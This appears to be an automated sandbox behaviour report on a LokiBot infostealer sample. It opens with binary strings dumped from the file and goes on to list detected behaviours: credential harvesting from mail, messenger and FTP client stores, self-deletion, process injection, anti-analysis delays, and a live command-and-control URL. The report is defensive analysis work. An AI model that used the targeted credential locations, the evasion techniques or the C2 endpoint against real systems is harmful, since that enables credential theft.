9#/..Z!
3Q^3Q_3Pz3Q
i6&@
#4NUZVqkFUezDtUfjFlmgBHmjaBq2esElOfl
3Q]3Q}3P~3QZ3P~3Q\3Pz3QZ3QZ3P{3Q|3P}3P{3Q|3Pz3Pz3P~3Q
3Qz3Q{3Q{3Q_3Qz3Q^3Q}3Q}3Q]3Q{3Q_3QZ3QZ3Q_3Q\3Q_3Q^3Pz3P|3Q}3Q{3Q
HCILO7hOfRTaLsDaTkGIxM8G
)Z .
=gk=/
;Ea+
T]$..
cpsr
3Q|3Qz3P
\lO,.."t\lc,..o
3Q_3P{3Q_3Q\3P}3Qz3Q^3Q]3Q]3Qz3Q^3P}3Qz3Q_3P}3Q
kfj>U{4#_
3P}3P~3Q
V;F(z
(..R)
$iiGqLbIKxAeeMLhoINwyDVMHduwKfjyf8enb
\lq-..tttt
&H`_
A dK
3Qz3QZ3Qz3Q
^/..
3Q]3Qz3P
3Q]3Qz3Q
h((>o_
3Q|3Pz3Q
3P{3Q}3P|3Pz3P~3Q_3Q_3Q
Tq,..
F0 fl^
Z=pQq
vir1
h..Z)R
3P|3Q|3P}3Q}3Q{3Q
3P|3P{3Q}3Q]3Q|3Pz3Q_3Q
3P~3Q{3Q\3Q]3Q}3Q^3Q]3P
3Qz3P~3P}3Q
3Qz3QZ3P|3P
Ty/..6E
Tq(..
Ty$..
'7pBrr0RobOxGzBxIo8dbbbMwJIOaN2oO5sOZWVs
,..dQ
Sf.<
} =KLC
3Q_3Q^3Q_3Q^3QZ3Q_3Q]3Q|3P~3Qz3Q|3Q\3Q_3Q
T -..\
Tq*..
/..\la*..
3QZ3P|3Q_3Q^3Q\3Pz3P|3Q}3Pz3P}3Q^3P}3P}3P~3Q}3Q^3Q}3P
X-fa98
3Q|3QZ3Q
3Q^3Q\3Q{3Q{3Pz3Q{3Q
3Q}3Q{3P{3Pz3P
Ay9X7O3xQ9bv867V4EqQ
$MWSTMcwmEYnayT7dKzMyPs3jG1KVTfQ3MmcP
fM#S
3Q{3QZ3Q^3Q
9i4..
0d`D:`
$..8
IBvh
=Wp(Q
3P~3P~3QZ3Q
Tq$..
5..R
3Q^3Q{3P{3Q}3Q^3Q{3Q
-Z-\
`Jyv]
4K1BU8meTaMyXWD12HLt2C0zZ
3Q|3Q{3P}3Q]3Q_3Q{3Q\3Q]3Q}3P{3Q|3Q\3Q^3P}3P|3P}3P{3Q\3P~3Q
OZ8TIkacDGqzkVRmwobn4c
9Lc..
XDK/..
..[U
3P|3P{3P~3Q]3Q
3Q^3Q}3Q_3P{3Q\3Q|3Pz3Q
(..TA
T5,..
3Qz3P~3Q}3Q]3Q]3P
3Q]3Pz3P~3Q]3Q{3Pz3Q]3P{3P|3Q^3Qz3Q
*/.R
3Pz3QZ3Pz3Q^3Q{3Q]3P}3P}3Q
3P}3Q^3P~3Q{3Q|3QZ3Q\3Q^3P|3Pz3Q}3Q]3Q|3Pz3Pz3P~3QZ3Q
3Q]3Qz3Q{3QZ3P
3Q]3Q\3P|3P~3Qz3Pz3Q^3P|3P~3Q|3P|3Q
1`hy<
3Q{3Q{3Q|3Q}3P~3QZ3P
3QZ3Q_3P}3P~3QZ3Q}3P
)..R)
3Q|3Q\3Q|3Q^3Q
3Q]3Q^3P}3P}3P}3Qz3Q
3Q|3Q]3P}3Q}3P~3Q]3P}3Q|3Q\3Q{3Q^3Q^3Q]3QZ3Q^3Q{3Q^3Pz3Q{3
c9Y
3Pz3Q_3Q]3Q
5...
`S'<
3Q}3P|3Pz3P}3Q]3Q|3P~3QZ3P}3Qz3P|3Q]3Q}3Q}3Q_3P
3P{3Q^3P~3Q
BkcT
3QZ3QZ3Qz3QZ3P}3Pz3Q
Tq&..
6LDC
3Q^3Qz3P}3Q
3QZ3Pz3Q\3Q{3P
3P~3Q|3QZ3Q\3Q]3Pz3P|3Pz3P|3P{3Q}3Q|3Q\3Q_3P{3P{3Pz3Q]3Q_3Q{3Q{3P~3Q{3Q\3Qz3P~3Qz3P
uXN
Px$G
UCeZF
hu<l
XL}&..
+ E
T%-..
3Q]3Q}3Q|3Q]3Q]3Q
9 i..Z!
Tq'...
T%'...X
9`A..
eF ~Q
9{9..Z)R
s/..
/...d
/...e
3P~3Q{3P
3Q\3Q^3Q_3P{3Q^3Q}3Pz3Q{3Q
3Q{3Q}3Q\3Q^3QZ3Q]3Q}3Q\3Q]3Q^3P|3Pz3Qz3Q{3P~3Q^3P|3Q
9V...
TQ-..
l..Z!
L/qk
3Q^3Qz3P}3Q|3Q|3Q^3P
3Pz3Q}3P~3P~3Q_3Q
q#6
3Q]3Q}3Qz3QZ3Q\3Q}3P~3Q\3P~3QZ3Q}3Q}3Q_3P|3Qz3Q
v?q)%
3P~3Q\3Q{3Q{3Q}3QZ3Q}3P~3Q
9N*...
vyWg
3Q_3Pz3Q\3Q
3Q}3Q]3P{3P|3P|3P}3Q{3P|3Pz3Q
Q9tf..Z)R
95S..
?]R)
3P{3Qz3P~3Qz3Q
%mpgXXNfXXDWO86F014waZaqmd2g12PQZb6UdO
!/.Z
T9/..
J..Z!
3Q\3Qz3Qz3Q]3QZ3Q_3P}3P}3Q\3Q^3Q
zzzz:
g3p*
3Q|3Q\3P
/..\T
T--..
3Pz3Pz3P|3Q
3QZ3Pz3Q}3Q^ *
3Q\3Q]3Q{3QZ3Q
p=g{|Wc
$..\D
}y0g&
3P|3Q]3Q|3Q]3P{3P~3Q{3P|3P
/..\D
;/.Z
f5cJ
,..\
3P~3Q^3Q_3P{3Q^3P}3Q
3Q^3Q{3Qz3P{3Q_3Q}3Q^3Q
TQ/..
8..Z
Aw|[ \
8..\
T9+..
T),..
/..\l
T9-..
3Q]3Qz3Pz3P}3P{3P{3Q^3Q
'TL?
3Pz3P}3P{3Qz3P
+'lc
XT/..
CF7I
3Q_3Q}3Pz3QZ3Q{3P
...p"
3P{3Q]3P{3Q^3P{3Q_3P|3QZ3P{3Pz3Pz3P
3Pz3Q|3P{3P|3P~3Q]3P}3P}3Q^3P|3Q_3Q|3Q
o..Z
"+
$KfAfoTWlWHRTdxVkwplu0NVArxwcqcX80LQv
Ta*..U
XD=/..
k+..
xN"`
A A0S
3Q{3Qz3Q^3Q]3Q
tttt.
3P~3Pz3Qz3P{3Pz3P|3Pz3P}3Pz3Q]3P
STOu
3Qz3P
T )..
3Q}3P{3P}3P
`osoG
3Q\3Q{3Q
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
3P{3Q_3QZ3Q]3P{3P}3Q
T +..
3Qz3Q{3Q^3Q
Il<g|
3Q}3QZ3Pz3P}3P}3QZ3Pz3Q
9./..
ul|(
3P~3P|3Pz3Q_3Q_3Qz3P
3P|3Q
3P|3P
g..Z
9K(/..
3QZ3P
3QZ3Q
o,..
3Q]3Qz3QZ3P{3Qz3Q]3Q_3Q^3P|3QZ3Q]3P~3Q
%k+"
System.Collections.Generic
K"xn
XDo/..
...n!
L..Z!
Ri<gbnK
3Qz3Q]3Q
3P}3P~3QZ3P{3P|3Q
T}+..
3Q\3Q_3Q_3Q]3Q_3Q\3P}3P}3Q\3Q}3Q^3Pz3P}3Pz3Q|3Q}3Q}3P|3P}3Pz3P}3Q
Te/..
TU(..
3Pz3Pz3Q{3Qz3Q]3Q}3Q\3P~3Q
3P|3Q^3Pz3Pz3Q
Te)..
*..R)
System.Windows.Forms
3P|3QZ3P~3Q]3Qz3Q|3Q{3Pz3Q^3Qz3Q^3P{3Q}3Q\3Q}3Qz3Q{3QZ3Pz3P{3QZ3Q
`G+f
xT4qiiEmR2wPxBxamH7FSbsTvNl0J
9<c..R
QMiEwFt3O30syD8UCu3tf7XqKhLpc0
...?r
3Q_3Q|3Q\3QZ3P{3Q{3Qz3Q
+iJ
3Q}3P}3QZ3P}3Pz3Q{3P}3P|3P
3Q}3Q{3Q_3QZ3Q|3Q
...a
W7u#
(m/d
i?*?z
\\%*..
3QZ3Q^3Q
3Q^3Q]3P
"t\l],..o
|"6z-
XL1/..
...\T
n/32
...\l
-R).
9|-..
9B9/.R
3P~3Q}3QZ3Q]3Q\3P}3P}3Q}3P{3P
^K'wV~K
\lA,.."t
3P}3Q|3Q}3Q\3Q{3P
qn 4
=]^R
TE$..D
5..Z)R
3Q\3Q}3Q}3P|3Q\
3P{3P|3Q_3Q}3Qz3P}3P
3Q\3P}3Q^3Q_3Q|3P~3P}3Q^3Pz3Q|3QZ3P{3Q}3P|3Q
3Q^3P}3Q|3Q]3P~3Q}3Pz3P{3Q_3Pz3Q]3Q_3Q]3Pz3Q^3Q^3Q|3Q\3Q{3Q\3Q{3Q]3Q^3Pz3Q\3Q
#Jn&[
3Q^3Qz3Q]3P}3Q_3Q_3P|3Q]3Q|3Q}3Q|3P{3P{3P|3Q{3Q|3Q_3QZ3Q_3Q\3Q^3P{3Qz3P
tttt9
..85
Z T
9RT..Z
\|Zc
...CU
d..Z)R
=23}
9 1..R
J(Wu!
9-m..X
3QZ3Q{3Q{3P{3QZ3P{3P{3P~3Q
3Q_3P{3P{3Qz3Qz3P~3P|3P~3Q|3P|3P{3P}3Q\3Qz3Qz3Q^3Q}3P{3Q|3P
5..Z!
?D{%LZ*
XTe/..
<v9Q
3Q{3Q^3Q\3Q
P.*3
X\//..
3P}3Pz3Q}3P~3Q]3Q{3Q\3P
%..9O
Tm/...
3P~3Q}3Q]3Q{3P}3QZ3P|3Q\3Pz3Q_3Q|3Q
MWhl<
,..XT
TY,...
qgl>
3P}3P|3Q|3Q\3Q
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-09-09 19:38:39 | 2018-09-09 19:41:48 | 189 |
17 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: ET TROJAN LokiBot User-Agent (Charon/Inferno)
- signature: ET TROJAN LokiBot Checkin
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M2
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
Collects information to fingerprint the system
Severity: High
Confidence: High
Harvests information related to installed mail clients
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Harvests information related to installed instant messenger clients
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local FTP client softwares
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
- file: C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
- file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
- key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
- key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Creates a hidden or system file
Severity: High
Confidence: Medium
- file: C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
- file: C:\Users\Seven01\AppData\Roaming\E62877
Attempts to repeatedly call a single API many times in order to delay analysis time
Severity: High
Confidence: Very High
- Spam: services.exe (476) called API GetSystemTimeAsFileTime 1852530 times
Deletes its original binary from disk
Severity: High
Confidence: Very High
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: 98765123.exe(2752) -> 98765123.exe(2124)
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 6.95, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0003e400, virtual_size: 0x0003e2e4
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://shaktiorkatimo.com/symboss/fre.php
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- http_version_old: HTTP traffic uses version 1.0
- suspicious_request: http://shaktiorkatimo.com/symboss/fre.php
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionAndSpinCount
- DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
- DynamicLoader: msvcrt.dll/_set_error_mode
- DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
- DynamicLoader: msvcrt.dll/_get_terminate
- DynamicLoader: KERNEL32.dll/FindActCtxSectionStringW
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: mscorwks.dll/SetLoadedByMscoree
- DynamicLoader: mscorwks.dll/_CorExeMain
- DynamicLoader: mscorwks.dll/GetCLRFunction
- DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
- DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
- DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
- DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
- DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
- DynamicLoader: ADVAPI32.dll/TraceEvent
- DynamicLoader: MSCOREE.DLL/IEE
- DynamicLoader: mscoreei.dll/IEE_RetAddr
- DynamicLoader: mscoreei.dll/IEE
- DynamicLoader: mscorwks.dll/IEE
- DynamicLoader: MSCOREE.DLL/GetStartupFlags
- DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
- DynamicLoader: mscoreei.dll/GetStartupFlags
- DynamicLoader: MSCOREE.DLL/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
- DynamicLoader: mscoreei.dll/GetCORVersion
- DynamicLoader: MSCOREE.DLL/GetCORSystemDirectory
- DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: ntdll.dll/RtlUnwind
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/AddVectoredContinueHandler
- DynamicLoader: KERNEL32.dll/RemoveVectoredContinueHandler
- DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
- DynamicLoader: shell32.dll/SHGetFolderPathW
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/GetWriteWatch
- DynamicLoader: KERNEL32.dll/ResetWriteWatch
- DynamicLoader: KERNEL32.dll/CreateMemoryResourceNotification
- DynamicLoader: KERNEL32.dll/QueryMemoryResourceNotification
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
- DynamicLoader: ADVAPI32.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/CryptCreateHash
- DynamicLoader: ADVAPI32.dll/CryptDestroyHash
- DynamicLoader: ADVAPI32.dll/CryptHashData
- DynamicLoader: ADVAPI32.dll/CryptGetHashParam
- DynamicLoader: ADVAPI32.dll/CryptImportKey
- DynamicLoader: ADVAPI32.dll/CryptExportKey
- DynamicLoader: ADVAPI32.dll/CryptGenKey
- DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
- DynamicLoader: ADVAPI32.dll/CryptDestroyKey
- DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
- DynamicLoader: ADVAPI32.dll/CryptSignHashA
- DynamicLoader: ADVAPI32.dll/CryptGetProvParam
- DynamicLoader: ADVAPI32.dll/CryptGetUserKey
- DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
- DynamicLoader: MSCOREE.DLL/GetMetaDataInternalInterface
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface_RetAddr
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorwks.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorjit.dll/getJit
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/GetUserDefaultUILanguage
- DynamicLoader: KERNEL32.dll/SetErrorMode
